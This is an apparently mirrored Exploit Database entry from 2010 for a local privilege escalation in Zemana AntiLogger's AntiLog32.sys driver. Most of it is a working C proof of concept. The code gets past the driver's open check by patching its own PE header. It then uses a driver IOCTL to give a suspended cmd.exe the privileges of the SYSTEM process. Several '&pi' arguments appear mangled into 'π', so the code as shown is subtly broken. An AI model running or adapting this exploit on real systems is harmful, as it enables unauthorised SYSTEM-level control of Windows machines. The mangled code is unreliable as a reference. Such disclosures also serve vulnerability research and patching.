Zemana AntiLogger ‘AntiLog32.sys’ 1.5.2.755 – Local Privilege Escalation

• Exploit Database
• 13 阅读

• 作者： th_decoder
  日期： 2010-07-28
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14491/

• Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability
  
  VULNERABLE PRODUCTS 
  Zemana AntiLogger <=1.9.2.2.206
  
  DETAILS:
  AntiLog32.sys create a device called \Device\AntiLog32 , and handles DeviceIoControl request IoControlCode = 0x8000201C , whichcan elevate the privilege of a process to another process
  
  EXPLOIT CODE:
  
  #include "stdafx.h"
  #include "windows.h"
  #include "winioctl.h"
  #define IOCTL_IMPERSONATE_PROCESS CTL_CODE(0x8000 , 0x807 , METHOD_BUFFERED , FILE_ANY_ACCESS)
  
  typedef struct _IMPERSONATE_PROCESS{
  	HANDLE ImpersonateProcess ; 
  	HANDLE SystemProcess ; 
  }IMPERSONATE_PROCESS , *PIMPERSONATE_PROCESS;
  
  int main(int argc, char* argv[])
  {
  	printf("Zemana AntiLogger <=1.9.2.2.206 AntiLog32.sys <= 1.5.2.755\n"
  		"Local Privilege Escalation Vulnerability Proof-of-Concept\n"
  		"2010-7-28\n"
  		"By MJ0011 th_decoder@126.com\n\nPress Enter\n");
  	getchar();
  	
  	//bypass some useless create check 
  
  	PIMAGE_DOS_HEADER pdoshdr = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
  	PIMAGE_NT_HEADERS pnthdr = (PIMAGE_NT_HEADERS)((ULONG)pdoshdr + pdoshdr->e_lfanew);
  	PVOID waddr = &pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress ;
  	
  	ULONG oldp ; 
  
  	VirtualProtect(waddr , sizeof(ULONG) , PAGE_READWRITE , &oldp);
  	pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0x1 ; 
  	VirtualProtect(waddr , sizeof(ULONG) , oldp , &oldp);
  
  
  	HANDLE hdev = CreateFile("\\\\.\\AntiLog32" , 
  		FILE_READ_ATTRIBUTES , 
  		FILE_SHARE_READ , 
  		0,
  		OPEN_EXISTING , 
  		0,0);
  
  	if (hdev == INVALID_HANDLE_VALUE)
  	{
  		printf("cannot open device %u\n" , GetLastError());
  		getchar();
  		return 0; 
  
  	}
  
  	STARTUPINFOA sia ; 
  	memset(&sia , 0 , sizeof(sia));
  	sia.cb = sizeof(sia);
  	PROCESS_INFORMATION pi ; 
  	memset(π , 0 , sizeof(pi));
  
  	
  
  	if (!CreateProcess("c:\\windows\\system32\\cmd.exe" , 
  		NULL , 
  		NULL,
  		NULL,
  		FALSE , 
  		CREATE_SUSPENDED,
  		NULL,
  		NULL,
  		&sia , 
  		π))
  	{
  		printf("cannot run cmd.exe....%u\n", GetLastError());
  		getchar();
  		return 0 ; 
  	}
  
  	
  	IMPERSONATE_PROCESS ip ; 
  	ip.ImpersonateProcess = (HANDLE)pi.dwProcessId ; 
  	ip.SystemProcess = (HANDLE)4 ; //// WinXP and later
  	ULONG btr ; 
  
  	if (!DeviceIoControl(hdev , IOCTL_IMPERSONATE_PROCESS , &ip , sizeof(ip) , NULL , 0 , &btr, 0))
  	{
  		printf("cannot impersonate process %u\n" , GetLastError());
  		getchar();
  		return 0 ; 
  	}
  
  	ResumeThread(pi.hThread);
  
  	printf("OK\n");
  
  	
  	return 0;
  }
  
  ================================
  
  
  
  
  th_decoder
  2010-07-28